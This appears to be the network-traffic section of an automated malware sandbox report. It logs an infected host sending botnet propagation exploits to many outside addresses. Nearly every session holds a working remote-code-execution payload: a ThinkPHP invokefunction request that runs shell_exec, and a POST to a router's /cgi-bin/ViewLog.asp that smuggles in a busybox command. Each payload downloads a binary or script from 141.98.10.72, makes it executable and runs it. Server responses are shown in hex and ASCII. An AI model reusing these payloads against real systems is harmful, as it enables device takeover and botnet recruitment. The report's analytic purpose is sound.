                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:23.585948944 CET478INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 256
                                                        Expires: Wed, 14 Feb 2024 08:34:23 GMT
                                                        Date: Wed, 14 Feb 2024 08:34:23 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 33 66 66 35 37 34 36 38 26 23 34 36 3b 31 37 30 37 38 39 39 36 36 33 26 23 34 36 3b 31 37 33 35 37 30 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;3ff57468&#46;1707899663&#46;173570</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        649192.168.2.144024295.110.206.19180
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:23.493720055 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:23.718219995 CET104INHTTP/1.1 400 Bad Request
                                                        Content-Length: 0
                                                        Server: RomPager/4.51 UPnP/1.0
                                                        Connection: close
                                                        Ext:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        650192.168.2.144839095.217.138.580
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:23.493920088 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:23.713732004 CET115INHTTP/1.1 400 Bad Request
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close
                                                        Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                        Data Ascii: 400 Bad Request


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        651192.168.2.143467894.26.5.1098080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:23.631345034 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        652192.168.2.146077494.122.20.2408080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:23.656243086 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        653192.168.2.145036294.120.236.2498080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:23.664448023 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        654192.168.2.144457494.123.148.1348080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:23.869543076 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        655192.168.2.145511085.122.219.428080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:24.234816074 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        656192.168.2.143976094.110.70.758080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:24.443854094 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        657192.168.2.143816485.194.41.488080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:24.465308905 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:24.700634003 CET176INHTTP/1.1 301 Moved Permanently
                                                        Location: /2.0/gui/?item=cgi-bin/ViewLog.asp
                                                        Content-Length: 0
                                                        Connection: close
                                                        Date: Wed, 14 Feb 2024 08:34:01 GMT
                                                        Server: HTTP Server


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        658192.168.2.143358294.123.61.898080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:24.484210014 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        659192.168.2.1453636112.31.10.1680
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:26.079616070 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:26.439455986 CET502INHTTP/1.1 400 Bad Request
                                                        Content-Type: text/html; charset=us-ascii
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Wed, 14 Feb 2024 08:34:26 GMT
                                                        Connection: close
                                                        Content-Length: 311
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        660192.168.2.145024494.122.91.838080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:27.019373894 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        661192.168.2.144096695.86.83.1678080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:27.019438028 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:28.357624054 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        662192.168.2.1459234112.196.82.18580
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:27.442281961 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        663192.168.2.145210095.65.36.7780
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:27.684556961 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:27.926944971 CET364INHTTP/1.1 505 HTTP Version not supported
                                                        Content-Type: text/html; charset=utf-8
                                                        Content-Length: 140
                                                        Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 35 20 48 54 54 50 20 56 65 72 73 69 6f 6e 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 35 20 48 54 54 50 20 56 65 72 73 69 6f 6e 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <html><head><title>505 HTTP Version not supported</title></head><body><center><h1>505 HTTP Version not supported</h1></center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        664192.168.2.144866695.58.97.22680
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:27.726347923 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:28.010668993 CET29INHTTP/1.1 200 OK
                                                        Feb 14, 2024 09:34:28.010839939 CET515INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68
                                                        Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        665192.168.2.145777294.110.84.78080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:28.245269060 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        666192.168.2.143337631.220.75.1028080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:28.245692015 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        667192.168.2.144633231.136.126.648080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:28.255805016 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:28.933723927 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:30.309664965 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:33.061534882 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:38.693211079 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:49.700761080 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:11.972093105 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:57.026057959 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
